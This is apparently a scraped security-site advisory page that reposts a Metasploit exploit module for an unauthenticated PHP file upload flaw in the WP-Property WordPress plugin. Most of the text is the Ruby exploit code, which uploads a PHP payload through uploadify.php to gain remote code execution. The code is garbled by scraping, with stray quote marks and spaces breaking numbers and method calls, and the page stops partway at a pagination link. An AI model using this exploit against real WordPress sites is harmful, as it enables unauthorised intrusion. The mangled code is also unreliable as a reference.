WordPress WP-Property PHP file upload vulnerability-vulnerability warning-the black bar safety net

2013-01-03T00:00:00
ID MYHACK58:62201336547
Type myhack58
Reporter 佚名
Modified 2013-01-03T00:00:00

Description

WordPress WP-Property PHP file upload vulnerability

> ## # This file is part of the Metasploit Framework and may be subject to > > # redistribution and commercial restrictions. Please see the Metasploit > > # Framework web site for more information on licensing and terms of use. > > # http://metasploit.com/framework/ ## > > require 'msf/core' require 'msf/core/exploit/php_exe' > > class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', 'Description' => %q{ This module exploits a vulnerability found in WP-Property < = 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' => [ 'Sammy FORGIT', # initial discovery 'James Fitts <fitts. james[at]gmail. com>' # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '8 2 6 5 6' ], [ 'BID', '5 3 7 8 7' ], [ 'EDB', '1 8 9 8 7'], [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ] ], 'Payload' => { 'BadChars' => "\x00", }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], [ 'Linux x86', { 'Arch' = > ARCH_X86, 'Platform' => 'linux' } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 2 6 2 0 1 2')) > > register_options( [ OptString. new('either the targeturi parameter', [true, 'The full URI path to WordPress', '/wordpress']) ], self.class) end > > def check uri = target_uri. path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php" }) > > if not res or res. code != 2 0 0 return Exploit::CheckCode::Unknown end > > return Exploit::CheckCode::Appears end > > def exploit uri = target_uri. path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}. php" php_payload = get_write_exec_payload(:unlink_self=>true) > > data = Rex::MIME::Message. new data. add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data. add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"") post_data = data. to_s. gsub(/^\r\n\-\-\Part\/, '--Part') > > print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php", 'ctype' => "multipart/form-data; boundary=#{data. bound}", 'data' => post_data }) > > [1] [2] next